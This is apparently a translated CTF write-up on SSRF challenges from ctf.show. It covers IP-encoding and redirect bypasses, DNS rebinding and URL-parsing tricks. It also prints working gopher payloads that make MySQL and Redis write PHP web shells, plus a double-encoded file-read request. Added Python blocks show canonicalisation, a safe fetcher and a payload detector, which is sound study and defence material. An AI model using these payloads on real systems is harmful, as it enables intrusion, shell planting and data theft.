SSRF

Bypasses

Adding a port

Short URLs

Domains that resolve to an arbitrary IP (xip.io)

IP restriction bypass

  • Decimal conversion
  • Octal conversion
  • Hexadecimal conversion
  • Mixed-radix conversion

302 redirect

dict://

file://

gopher://

http://www.baidu.com@127.0.0.1

gopher://

Gopher is a distributed document retrieval protocol used on the Internet.

The gopher protocol can be used to issue GET and POST requests: capture a GET or POST request first, then rewrite it into a request that conforms to the gopher protocol. Gopher is the most powerful protocol in SSRF exploitation (commonly called the "universal protocol").

Using gopher against Redis

web ssrf -> gopher

Redis with no password

cron reverse shell

CTFSHOW-SSRF - Figure 1

Using gopher against MySQL

ssrf

MySQL with no password

web352

Radix bypass

  • Hexadecimal: url=http://0x7F.0.0.1/flag.php
  • Octal: url=http://0177.0.0.1/flag.php
  • Decimal integer form: url=http://2130706433/flag.php
  • Hexadecimal integer form (use the same conversion site as above; remember the 0x prefix): url=http://0x7F000001/flag.php
  • There is also a special abbreviated form: 127.0.0.1 can be written as 127.1
  • CIDR bypass of localhost: url=http://127.127.127.127/flag.php
  • url=http://0/flag.php
  • url=http://0.0.0.0/flag.php
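Every spelling in the list above is the same loopback address; a filter that compares the URL string against "127.0.0.1" sees none of them. The defensive counterpart is to canonicalise the host before checking it. The following is an added example, not code from the CTFSHOW writeup: it parses an IPv4 literal the way inet_aton does (hex, octal, decimal, and the 1-, 2- or 3-part shorthand), turns it into a dotted quad with the standard library's ipaddress module, and compares that against a naive substring blocklist. The `naive_block` and `check_url` helpers are illustrative names of my own.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Added example, not code from the writeup. Each dotted part is parsed as
# inet_aton does: 0x-prefixed hex, leading-0 octal, otherwise decimal.
_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*")


def _part_value(part: str):
    if _HEX.fullmatch(part):
        return int(part[2:], 16)
    if _OCT.fullmatch(part):
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    return None  # "08", "1_0", "", unicode digits: not a literal


def parse_ipv4_literal(host: str):
    """Return the 32-bit integer for an IPv4 literal in any inet_aton form
    (a, a.b, a.b.c, a.b.c.d; the last part fills the remaining bytes), or
    None when the string is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_value(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    if any(v > 0xFF for v in leading):
        return None
    tail_bytes = 4 - len(leading)            # bytes covered by the last part
    if last >= 1 << (8 * tail_bytes):
        return None
    n = 0
    for v in leading:
        n = (n << 8) | v
    return (n << (8 * tail_bytes)) | last


def canonical_ip(host: str):
    """Dotted-quad IPv4Address for any literal spelling, else None."""
    n = parse_ipv4_literal(host)
    return None if n is None else ipaddress.IPv4Address(n)


def is_internal_literal(host: str) -> bool:
    """True when the host is an IPv4 literal that maps to loopback, private,
    link-local, reserved or unspecified space (0.0.0.0, 127.x, 10.x, ...).
    A hostname returns False here: it must be resolved and re-checked."""
    ip = canonical_ip(host)
    return ip is not None and not ip.is_global


def naive_block(url: str) -> bool:
    """The string blocklist the challenges defeat: looks for the literal text."""
    return "127.0.0.1" in url or "localhost" in url.lower()


def check_url(url: str) -> dict:
    """Compare the naive filter with canonicalisation for one URL."""
    host = urlsplit(url).hostname or ""
    ip = canonical_ip(host)
    return {
        "host": host,
        "canonical": None if ip is None else str(ip),
        "naive_blocked": naive_block(url),
        "internal": is_internal_literal(host),
    }


if __name__ == "__main__":
    for u in ("http://0x7F.0.0.1/flag.php", "http://0177.0.0.1/flag.php",
              "http://2130706433/flag.php", "http://0x7F000001/flag.php",
              "http://127.1/flag.php", "http://0/flag.php",
              "http://127.127.127.127/flag.php", "http://0.0.0.0/flag.php"):
        print(u, check_url(u))
```

Run as a script, every URL from the web352 list reports `naive_blocked: False` but `internal: True` with canonical 127.0.0.1 or 0.0.0.0. Note that the check only handles literals; for a hostname the same `is_global` test has to be applied to every address it resolves to, and the connection then has to be made to that same address (see the redirect and rebinding challenges below).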

web353

Radix bypass

web354

302 redirect

<?php
header("Location:http://127.0.0.1/flag.php");

DNS rebinding attack bypass

url=http://xxxx/flag.php (register at ceye.io, bind the record to 127.0.0.1, and remember the r prefix)
// A record is 127.0.0.1    url=http://sudo.cc/flag.php

web355

host shorter than 5 characters

url=http://0/flag.php

web356

host shorter than 3 characters

url=http://0/flag.php

web357

Key code

if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}

FILTER_FLAG_IPV4 - requires the value to be a valid IPv4 address (e.g. 255.255.255.255)
FILTER_FLAG_IPV6 - requires the value to be a valid IPv6 address (e.g. 2001:0db8:85a3:08d3:1319:8a2e:0370:7334)
FILTER_FLAG_NO_PRIV_RANGE - requires the value not to fall in the RFC-specified private ranges (e.g. 192.168.0.1 is rejected)
FILTER_FLAG_NO_RES_RANGE - requires the value not to fall in the reserved ranges. This flag accepts both IPv4 and IPv6 values.

The check only looks at the IP the user supplied, so a 302 redirect to the internal address bypasses it.

web358

Code

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

parse_url parsing issue: the regex matches the whole string, but in the URL below "ctf." is the userinfo part and the real host is 127.0.0.1

url=http://ctf.@127.0.0.1/flag.php?show

CTFSHOW-SSRF - Figure 2
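web354, web357 and web358 defeat three different checks for the same reason: the check runs on something other than the connection that is finally made (the first URL rather than the redirect target, the name rather than the address it resolves to at connect time, the raw string rather than the parsed host). The block below is an added example, not code from the writeup or from ctf.show, of a fetcher that validates every hop. It is written against a pluggable `resolver` and `fetch_once` so it runs offline; `FAKE_DNS`, `FAKE_HTTP`, the 93.184.216.34 address and the responses are constructed for the demo, and `sudo.cc` stands in for a name whose A record has been pointed at 127.0.0.1 as in the rebinding step above.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Added example, not code from the writeup.
ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


class BlockedRequest(Exception):
    """Raised when a hop of the fetch would reach something it must not."""


def resolve_all(host: str) -> set:
    """Default resolver: every A/AAAA answer for host (needs network)."""
    return {ipaddress.ip_address(ai[4][0]) for ai in socket.getaddrinfo(host, None)}


def validate_target(url: str, resolver=resolve_all):
    """Check one URL and return (host, pinned_ip, port).
    Rejects: schemes other than http(s); userinfo, so http://ctf.@127.0.0.1/
    cannot pass a check that only looked at 'ctf.'; hosts for which any
    resolved address is loopback, private, link-local, reserved or unspecified."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise BlockedRequest(f"scheme not allowed: {scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise BlockedRequest("userinfo is not allowed in the URL")
    host = parts.hostname
    if not host:
        raise BlockedRequest("empty host")
    addrs = resolver(host)
    if not addrs:
        raise BlockedRequest(f"{host} does not resolve")
    for ip in addrs:
        if not ip.is_global:
            raise BlockedRequest(f"{host} resolves to non-global {ip}")
    pinned = min(addrs, key=lambda a: (a.version, int(a)))
    return host, pinned, parts.port or (443 if scheme == "https" else 80)


def fetch_safely(url: str, fetch_once, resolver=resolve_all, max_redirects=3):
    """Follow redirects by hand, validating every hop.
    fetch_once(url, pinned_ip) -> (status, headers, body) must open its TCP
    connection to pinned_ip rather than resolving the name again, so a DNS
    rebinding between check and use has no effect. Returns (status, body, hops)."""
    hops = [url]
    for _ in range(max_redirects + 1):
        host, ip, port = validate_target(url, resolver)
        status, headers, body = fetch_once(url, ip)
        if status not in REDIRECT_CODES:
            return status, body, hops
        location = headers.get("Location")
        if not location:
            raise BlockedRequest("redirect without Location")
        url = urljoin(url, location)
        hops.append(url)
    raise BlockedRequest("too many redirects")


# ---- constructed offline scenario (no real DNS or HTTP) -------------------
FAKE_DNS = {
    "ctf.show": {ipaddress.ip_address("93.184.216.34")},   # constructed public IP
    "sudo.cc": {ipaddress.ip_address("127.0.0.1")},        # A record pointed at loopback
    "127.0.0.1": {ipaddress.ip_address("127.0.0.1")},
}
FAKE_HTTP = {
    "http://ctf.show/index.html": (200, {}, "hello"),
    "http://ctf.show/jump": (302, {"Location": "http://127.0.0.1/flag.php"}, ""),
    "http://127.0.0.1/flag.php": (200, {}, "flag contents"),
}


def fake_resolver(host):
    return FAKE_DNS.get(host, set())


def fake_fetch(url, pinned_ip):
    return FAKE_HTTP.get(url, (404, {}, ""))


def demo() -> dict:
    """Run the challenge tricks through the guarded fetcher; returns outcomes."""
    cases = {
        "plain": "http://ctf.show/index.html",
        "302 to loopback (web354/web357)": "http://ctf.show/jump",
        "rebinding name (web354)": "http://sudo.cc/flag.php",
        "userinfo confusion (web358)": "http://ctf.@127.0.0.1/flag.php?show",
        "gopher (web359/web360)": "gopher://127.0.0.1:6379/_%2A1%0D%0A",
    }
    out = {}
    for name, u in cases.items():
        try:
            status, body, hops = fetch_safely(u, fake_fetch, fake_resolver)
            out[name] = f"allowed {status} after {len(hops)} hop(s)"
        except BlockedRequest as e:
            out[name] = f"blocked: {e}"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:36} {v}")
```

Only the plain request is allowed; the redirect is stopped at its second hop, the rebinding name and the userinfo URL at their first. For the PHP curl code in this writeup the same controls are: no CURLOPT_FOLLOWLOCATION (handle redirects yourself as above), CURLOPT_PROTOCOLS limited to CURLPROTO_HTTP | CURLPROTO_HTTPS so gopher://, dict:// and file:// are refused by the client rather than by a regex, and CURLOPT_RESOLVE to pin the checked address.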

web359

Generate the payload with the exploit script

CTFSHOW-SSRF - Figure 3

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4b%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%68%75%61%68%75%61%2e%70%68%70%27%01%00%00%00%01

web360

Attacking Redis

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

SSRF-ME

<?php 
error_reporting(0);
highlight_file(__FILE__);
$url=$_GET['url'];
if(preg_match('/127.0.0.1|flag|dict|file|ftp/i',$url)){
  die('想都别想');
}//read.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
echo $output;
curl_close($ch);

First read read.php: ?url=http://127.1/read.php

<?php
if('127.0.0.1'!=$_SERVER['REMOTE_ADDR']){
    die('Allow local only');
}
if('GET' === $_SERVER['REQUEST_METHOD']){
  highlight_file(__FILE__);
  die('Invalid request mode');
}

$filename=$_POST['name'];
if(preg_match('/..\//',$filename)){
    die('nonono');
}
echo file_get_contents(urldecode($filename));

A POST request carrying the name parameter gives arbitrary file read. The only filter is:

if(preg_match('/..\//',$filename)){
    die('nonono');
}

Bypass it with double encoding (there is a urldecode call on the value).

Send the POST request message via the gopher protocol.

Construct the POST request:

POST /read.php HTTP/1.1
Host: 127.1:
Content-Length: 50
Content-Type: application/x-www-form-urlencoded

name=/flag

The URL gets decoded once by the web layer and once more by curl.

Construct the payload (the /flag after the equals sign needs four rounds of URL encoding; everything else needs two):

?url=gopher://127.1:80/_POST%2520%252Fread.php%2520HTTP%252F1.1%250AHost%253A%2520127.1%253A80%250AContent-Length%253A%252050%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250A%250Aname%253D%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%32%25%32%35%25%33%36%25%33%36%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%36%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%37
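The web359, web360 and SSRF-ME payloads all have the same shape on the wire: a gopher:// URL whose path carries a percent-encoded Redis or HTTP request, sometimes encoded several times so that one round of decoding in the filter is not enough. For detection that shape is the signal. The block below is an added example, not code from the writeup: it decodes the path until it stops changing (counting the rounds), parses the result as RESP arrays (the form Redis reads) or as an HTTP request, and reports the commands. `SAMPLE_REDIS` and `SAMPLE_HTTP` are constructed in the block, modelled on the web360 and SSRF-ME payloads, and `REDIS_WRITE_CMDS` is my own short list of commands worth flagging, not an exhaustive one.

```python
import re
from urllib.parse import quote, unquote

# Added example, not code from the writeup.
RISKY_SCHEMES = {"gopher", "dict", "file", "ftp"}
HTTP_METHODS = ("GET ", "POST ", "PUT ", "DELETE ", "HEAD ", "OPTIONS ", "PATCH ")
REDIS_WRITE_CMDS = {"flushall", "flushdb", "config", "save", "bgsave", "set",
                    "slaveof", "replicaof"}   # illustrative list, not exhaustive


def fully_decode(s: str, max_rounds: int = 8):
    """Percent-decode until the text stops changing. Returns (text, rounds):
    rounds > 1 means the input was encoded more than once, which is the
    trick used to slip a value past a filter that decodes only once."""
    rounds = 0
    while rounds < max_rounds:
        d = unquote(s)
        if d == s:
            break
        s, rounds = d, rounds + 1
    return s, rounds


def parse_resp(data: str):
    """Parse consecutive RESP arrays of bulk strings (what the gopher Redis
    payloads carry) into a list of argument lists. A truncated or malformed
    array is kept with the arguments parsed so far."""
    cmds, i = [], 0
    while i < len(data) and data[i] == "*":
        end = data.find("\r\n", i)
        if end < 0 or not data[i + 1:end].isdigit():
            break
        count, i, args = int(data[i + 1:end]), end + 2, []
        for _ in range(count):
            end = data.find("\r\n", i)
            if i >= len(data) or data[i] != "$" or end < 0 or not data[i + 1:end].isdigit():
                break
            size, i = int(data[i + 1:end]), end + 2
            args.append(data[i:i + size])
            i += size + 2                       # skip the bulk string and its CRLF
        cmds.append(args)
    return cmds


def inspect_url(raw_url: str) -> dict:
    """Classify one user-supplied URL the way a WAF rule or log query would."""
    scheme, sep, rest = raw_url.partition("://")
    scheme = unquote(scheme).strip().lower()
    finding = {"scheme": scheme, "risky_scheme": scheme in RISKY_SCHEMES,
               "target": None, "decode_rounds": 0, "redis_commands": [],
               "redis_write_commands": [], "http_request_line": None, "http_body": None}
    if not sep or scheme != "gopher":
        return finding
    netloc, _, payload = rest.partition("/")
    finding["target"] = netloc
    if payload.startswith("_"):                 # gopher item-type selector
        payload = payload[1:]
    data, rounds = fully_decode(payload)
    finding["decode_rounds"] = rounds
    if data.startswith("*"):
        cmds = parse_resp(data)
        finding["redis_commands"] = [" ".join(c) for c in cmds]
        finding["redis_write_commands"] = [c[0].lower() for c in cmds
                                           if c and c[0].lower() in REDIS_WRITE_CMDS]
    elif data.startswith(HTTP_METHODS):
        head, *body = re.split(r"\r?\n\r?\n", data, maxsplit=1)
        finding["http_request_line"] = head.split("\n", 1)[0].rstrip("\r")
        finding["http_body"] = body[0] if body else ""
    return finding


def _resp(*args):
    return "*%d\r\n%s" % (len(args), "".join("$%d\r\n%s\r\n" % (len(a), a) for a in args))


def _layers(s, n):
    for _ in range(n):
        s = quote(s, safe="")
    return s


# Constructed samples modelled on the web360 and SSRF-ME payloads.
SAMPLE_REDIS = "gopher://127.0.0.1:6379/_" + quote(
    _resp("flushall") + _resp("config", "set", "dir", "/var/www/html") + _resp("save"), safe="")
_REQUEST = ("POST /read.php HTTP/1.1\r\nHost: 127.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 10\r\n\r\nname=")
SAMPLE_HTTP = "gopher://127.1:80/_" + _layers(_REQUEST, 2) + _layers("/flag", 4)

if __name__ == "__main__":
    for u in (SAMPLE_REDIS, SAMPLE_HTTP, "http://ctf.show/", "dict://127.0.0.1:6379/info"):
        print(inspect_url(u))
```

On the Redis sample the report lists flushall, config set dir /var/www/html and save after one decoding round; on the HTTP sample it recovers the POST /read.php request line and the body name=/flag only after four rounds, which is the same count the writeup arrives at by hand. A rule that fires on a gopher/dict/file scheme, or on any URL whose path needs more than one decoding round, catches both without knowing the target service.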